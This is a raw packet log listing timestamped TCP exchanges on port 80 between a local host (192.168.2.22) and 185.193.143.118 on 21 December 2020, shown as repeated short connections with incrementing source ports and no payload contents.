Dec 21, 2020 08:33:37.163697958 CET	80	49177	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.349551916 CET	49178	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.407118082 CET	80	49178	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.407272100 CET	49178	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.413851023 CET	49178	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.471282959 CET	80	49178	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.471499920 CET	49178	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.528875113 CET	80	49178	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.608020067 CET	80	49178	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.608175993 CET	49178	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.608213902 CET	49178	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.665604115 CET	80	49178	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.825033903 CET	49179	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.890177965 CET	80	49179	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.890322924 CET	49179	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.896116018 CET	49179	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:37.961051941 CET	80	49179	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:37.961241007 CET	49179	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.026289940 CET	80	49179	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.091372013 CET	80	49179	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.091478109 CET	49179	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.091527939 CET	49179	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.156410933 CET	80	49179	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.303791046 CET	49180	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.360721111 CET	80	49180	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.360826015 CET	49180	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.365580082 CET	49180	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.422683001 CET	80	49180	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.422821999 CET	49180	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.479712963 CET	80	49180	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.546295881 CET	80	49180	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.546495914 CET	49180	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.546605110 CET	49180	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.603646040 CET	80	49180	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.778299093 CET	49181	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.839755058 CET	80	49181	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.839874029 CET	49181	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.845704079 CET	49181	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.907352924 CET	80	49181	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:38.907458067 CET	49181	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:38.968863964 CET	80	49181	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.040893078 CET	80	49181	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.040994883 CET	49181	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.041039944 CET	49181	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.102207899 CET	80	49181	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.255230904 CET	49182	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.316502094 CET	80	49182	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.316616058 CET	49182	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.320761919 CET	49182	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.382134914 CET	80	49182	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.382222891 CET	49182	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.443460941 CET	80	49182	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.513073921 CET	80	49182	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.513223886 CET	49182	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.513262987 CET	49182	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.574507952 CET	80	49182	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.746757030 CET	49183	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.810002089 CET	80	49183	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.810100079 CET	49183	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.813663960 CET	49183	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.876861095 CET	80	49183	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:39.876949072 CET	49183	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:39.940032959 CET	80	49183	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.004152060 CET	80	49183	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.004282951 CET	49183	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.004333973 CET	49183	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.067552090 CET	80	49183	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.230964899 CET	49184	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.288064957 CET	80	49184	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.288328886 CET	49184	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.294286013 CET	49184	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.351146936 CET	80	49184	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.351317883 CET	49184	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.408134937 CET	80	49184	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.472325087 CET	80	49184	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.472433090 CET	49184	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.472496033 CET	49184	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.529269934 CET	80	49184	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.678402901 CET	49185	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.737365961 CET	80	49185	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.737484932 CET	49185	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.742275953 CET	49185	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.800812960 CET	80	49185	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.800924063 CET	49185	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.859195948 CET	80	49185	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.927834988 CET	80	49185	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:40.927944899 CET	49185	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.927999973 CET	49185	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:40.986521006 CET	80	49185	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.151731968 CET	49186	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.216443062 CET	80	49186	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.216558933 CET	49186	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.221610069 CET	49186	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.285415888 CET	80	49186	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.285546064 CET	49186	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.349855900 CET	80	49186	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.413666010 CET	80	49186	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.413762093 CET	49186	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.413803101 CET	49186	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.477613926 CET	80	49186	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.642685890 CET	49187	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.701852083 CET	80	49187	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.702089071 CET	49187	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.708348036 CET	49187	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.767492056 CET	80	49187	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.767617941 CET	49187	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.826864004 CET	80	49187	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.895755053 CET	80	49187	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:41.895883083 CET	49187	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.895926952 CET	49187	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:41.955202103 CET	80	49187	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.119492054 CET	49188	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.182430029 CET	80	49188	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.182543039 CET	49188	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.188874006 CET	49188	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.251657009 CET	80	49188	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.251842976 CET	49188	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.314522982 CET	80	49188	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.381172895 CET	80	49188	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.381253958 CET	49188	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.381287098 CET	49188	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.444106102 CET	80	49188	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.605488062 CET	49189	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.663501024 CET	80	49189	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.663593054 CET	49189	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.666408062 CET	49189	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.724548101 CET	80	49189	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.724617958 CET	49189	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.782562017 CET	80	49189	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.848618984 CET	80	49189	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:42.848727942 CET	49189	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.848767996 CET	49189	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:42.906702042 CET	80	49189	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.057789087 CET	49190	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.120680094 CET	80	49190	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.120812893 CET	49190	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.123722076 CET	49190	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.186449051 CET	80	49190	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.186587095 CET	49190	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.249430895 CET	80	49190	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.317317009 CET	80	49190	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.317439079 CET	49190	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.317500114 CET	49190	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.380400896 CET	80	49190	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.545583963 CET	49191	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.605030060 CET	80	49191	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.605164051 CET	49191	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.611074924 CET	49191	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.670464993 CET	80	49191	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.670574903 CET	49191	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.730079889 CET	80	49191	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.801179886 CET	80	49191	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:43.801285028 CET	49191	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.801320076 CET	49191	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:43.860661983 CET	80	49191	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.028099060 CET	49192	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.090918064 CET	80	49192	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.091022968 CET	49192	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.096730947 CET	49192	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.159554005 CET	80	49192	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.159651041 CET	49192	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.222703934 CET	80	49192	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.293749094 CET	80	49192	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.293855906 CET	49192	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.293910980 CET	49192	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.356652975 CET	80	49192	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.501997948 CET	49193	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.565144062 CET	80	49193	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.565387964 CET	49193	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.571158886 CET	49193	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.634294033 CET	80	49193	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.634759903 CET	49193	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.697949886 CET	80	49193	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.761157990 CET	80	49193	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.761308908 CET	49193	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.761337996 CET	49193	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:44.824513912 CET	80	49193	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:44.984817028 CET	49194	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.050415993 CET	80	49194	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.050510883 CET	49194	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.056071043 CET	49194	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.122468948 CET	80	49194	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.122592926 CET	49194	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.188246012 CET	80	49194	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.256386995 CET	80	49194	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.256465912 CET	49194	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.256517887 CET	49194	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.322160959 CET	80	49194	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.463680983 CET	49195	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.525731087 CET	80	49195	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.525846958 CET	49195	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.531713009 CET	49195	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.593627930 CET	80	49195	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.593708992 CET	49195	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.655495882 CET	80	49195	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.724093914 CET	80	49195	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.724201918 CET	49195	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.724256039 CET	49195	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.785953999 CET	80	49195	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.931837082 CET	49196	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:45.994086027 CET	80	49196	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:45.994205952 CET	49196	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.000245094 CET	49196	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.062460899 CET	80	49196	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.062572956 CET	49196	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.124686956 CET	80	49196	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.197207928 CET	80	49196	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.197304010 CET	49196	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.197357893 CET	49196	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.259581089 CET	80	49196	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.442466974 CET	49197	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.499764919 CET	80	49197	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.499906063 CET	49197	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.505912066 CET	49197	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.563442945 CET	80	49197	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.563626051 CET	49197	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.620876074 CET	80	49197	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.689477921 CET	80	49197	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.690105915 CET	49197	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.690155983 CET	49197	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.747584105 CET	80	49197	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.884321928 CET	49198	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.946352959 CET	80	49198	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:46.946481943 CET	49198	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:46.952497005 CET	49198	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.014801979 CET	80	49198	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.014899015 CET	49198	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.076994896 CET	80	49198	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.145210028 CET	80	49198	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.145308018 CET	49198	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.145401001 CET	49198	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.207503080 CET	80	49198	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.367733955 CET	49199	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.430686951 CET	80	49199	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.430867910 CET	49199	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.436851978 CET	49199	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.499983072 CET	80	49199	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.500144958 CET	49199	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.562894106 CET	80	49199	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.628328085 CET	80	49199	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.628453016 CET	49199	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.628494978 CET	49199	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.691303015 CET	80	49199	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.840061903 CET	49200	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.903938055 CET	80	49200	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.904019117 CET	49200	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.907512903 CET	49200	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:47.971527100 CET	80	49200	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:47.971669912 CET	49200	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.035887957 CET	80	49200	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.102720976 CET	80	49200	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.102822065 CET	49200	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.102886915 CET	49200	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.166929960 CET	80	49200	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.331978083 CET	49201	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.393245935 CET	80	49201	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.393393993 CET	49201	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.399306059 CET	49201	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.460573912 CET	80	49201	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.460774899 CET	49201	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.522100925 CET	80	49201	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.594541073 CET	80	49201	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.594676018 CET	49201	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.594718933 CET	49201	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.655917883 CET	80	49201	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.801399946 CET	49202	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.862258911 CET	80	49202	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.862373114 CET	49202	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.868225098 CET	49202	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.929091930 CET	80	49202	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:48.929223061 CET	49202	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:48.990150928 CET	80	49202	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.054697990 CET	80	49202	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.054821014 CET	49202	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.054867029 CET	49202	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.115705013 CET	80	49202	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.274645090 CET	49203	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.339855909 CET	80	49203	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.339987993 CET	49203	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.345743895 CET	49203	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.410790920 CET	80	49203	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.410888910 CET	49203	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.475718975 CET	80	49203	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.538414955 CET	80	49203	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.538551092 CET	49203	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.538604021 CET	49203	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.603672028 CET	80	49203	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.776097059 CET	49204	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.835519075 CET	80	49204	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.835648060 CET	49204	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.842369080 CET	49204	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.901700974 CET	80	49204	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:49.901842117 CET	49204	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:49.961304903 CET	80	49204	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.024385929 CET	80	49204	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.024528980 CET	49204	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.024569988 CET	49204	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.083869934 CET	80	49204	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.236651897 CET	49205	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.301368952 CET	80	49205	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.301467896 CET	49205	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.305217981 CET	49205	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.367795944 CET	80	49205	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.367908001 CET	49205	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.430346012 CET	80	49205	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.502685070 CET	80	49205	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.505511045 CET	49205	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.505563021 CET	49205	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.567965031 CET	80	49205	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.729331970 CET	49206	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.793194056 CET	80	49206	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.793509960 CET	49206	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.800059080 CET	49206	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.863383055 CET	80	49206	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.863985062 CET	49206	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.927113056 CET	80	49206	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.995313883 CET	80	49206	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:50.995434046 CET	49206	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:50.995533943 CET	49206	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.058789968 CET	80	49206	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.201917887 CET	49207	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.260713100 CET	80	49207	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.260850906 CET	49207	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.266644001 CET	49207	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.325525045 CET	80	49207	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.325645924 CET	49207	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.384180069 CET	80	49207	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.461715937 CET	80	49207	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.461807013 CET	49207	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.461847067 CET	49207	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.521903038 CET	80	49207	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.663672924 CET	49208	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.723344088 CET	80	49208	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.723481894 CET	49208	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.729572058 CET	49208	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.788949013 CET	80	49208	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.789057016 CET	49208	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:33:51.848351955 CET	80	49208	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.917480946 CET	80	49208	185.193.143.118	192.168.2.22
Dec 21, 2020 08:33:51.917619944 CET	49208	80	192.168.2.22	185.193.143.118
